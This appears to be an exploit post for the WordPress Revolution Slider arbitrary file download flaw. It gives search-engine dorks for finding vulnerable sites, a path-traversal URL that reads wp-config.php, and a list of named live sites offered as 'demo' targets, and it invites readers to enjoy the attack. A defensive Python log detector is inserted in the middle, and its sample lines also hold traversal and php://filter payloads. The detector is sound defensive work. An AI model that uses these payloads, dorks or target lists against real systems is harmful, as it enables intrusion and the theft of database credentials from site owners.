
WordPress Arbitrary File Download {0day}

Author: bRpsd , Published: 04-10-2014
#TITLE: WordPress Arbitrary File Download {0day}
#Author: bRpsd
#Mail: cy@Live.no
#Skype: vegnox
#DORKS (FIXED):
inurl:wp-content
inurl:wp-content/themes/
inurl:wp-content inurl:revslider
inurl:wp-content intext:revslider.php
inurl:wp-content intext:revslider_front.php
inurl:wp-content intext:revslider.php site:il
themes/WP-Smartcheck
themes/stendhal
theme/templates/sliders
themes/RoyalOak
themes/celestino2
plugins/dnd-shortcodes
themes/incrediblewp
themes/celestino
plugins/meteor-extras
themes/bazar
themes/cheope
themes/aziza

# How to exploit:
# Revolution Slider registers revslider_show_image as a nopriv admin-ajax action, so no login is
# needed, and it hands the img parameter to a file read without stripping ../ sequences. The path
# is resolved relative to wp-admin/ (the working directory of admin-ajax.php), so ../wp-config.php
# is the WordPress root config: database credentials and auth salts. Affected: Revolution Slider
# 4.1.4 and earlier; fixed in 4.2 (February 2014), later assigned CVE-2015-1579. Copies bundled
# inside commercial themes are rarely updated, which is why the dork list above targets themes.
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

(e.g.):
http://www.example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

(Demo / test / PoC):
www.sharek.ps/en/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.lorencitavdesantos.gov.co/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.southvanphysio.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.lasallest.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.daleeke.com//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
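On the defensive side, every request in the list above leaves the same footprint in the web server's access log: a GET to admin-ajax.php with action=revslider_show_image and an img value that either contains ../ or does not name an image at all. The following detector is an added example, not part of the original post. It parses combined-format log lines, percent-decodes the img value twice so that %2e%2e and %252e%252e are both caught, and flags the abusive requests per source IP. The SAMPLE_LOG lines are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined log format.
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RX = re.compile(r"\.\.[\\/]")
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".webp")

# Constructed sample: one attacker (203.0.113.7), one legitimate slider client.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3191 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2014:13:55:37 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2014:13:56:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=/wp-content/uploads/slider1.png HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2014:13:56:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action HTTP/1.1" 200 32 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2014:13:57:10 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=php://filter/convert.base64-encode/resource=../wp-config.php HTTP/1.1" 200 4250 "-" "Mozilla/5.0"
"""


def decode_twice(value):
    """Undo double percent-encoding; harmless on already-decoded input."""
    return unquote(unquote(value))


def analyse_request(target):
    """Reason string if the request target abuses revslider_show_image, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # parse_qs decodes once
    if qs.get("action", [""])[0] != "revslider_show_image":
        return None
    img = decode_twice(qs.get("img", [""])[0])
    if TRAVERSAL_RX.search(img):
        return "traversal in img=%r" % img
    if not img.lower().endswith(IMAGE_EXT):
        return "non-image target img=%r" % img  # /etc/passwd, php:// wrappers, .php files
    return None


def scan_log(lines):
    """(ip, timestamp, status, reason) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RX.match(line)
        if not m:
            continue
        reason = analyse_request(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), reason))
    return hits


def by_source(hits):
    """Flagged-request count per source IP, for blocking or triage."""
    return dict(Counter(ip for ip, _, _, _ in hits))


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(*hit)
    print(by_source(scan_log(SAMPLE_LOG.splitlines())))
```

A 200 on a flagged line is the important signal: with the vulnerable plugin the file is served, so status alone does not distinguish a successful leak from a normal slider image request, and the img value has to be inspected.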

# This exploit is old, but people were using the wrong dorks. So I changed the dorks and got many results!
# Sites will never stop being vulnerable (:
# Enjoy everyone .. Peace ~!
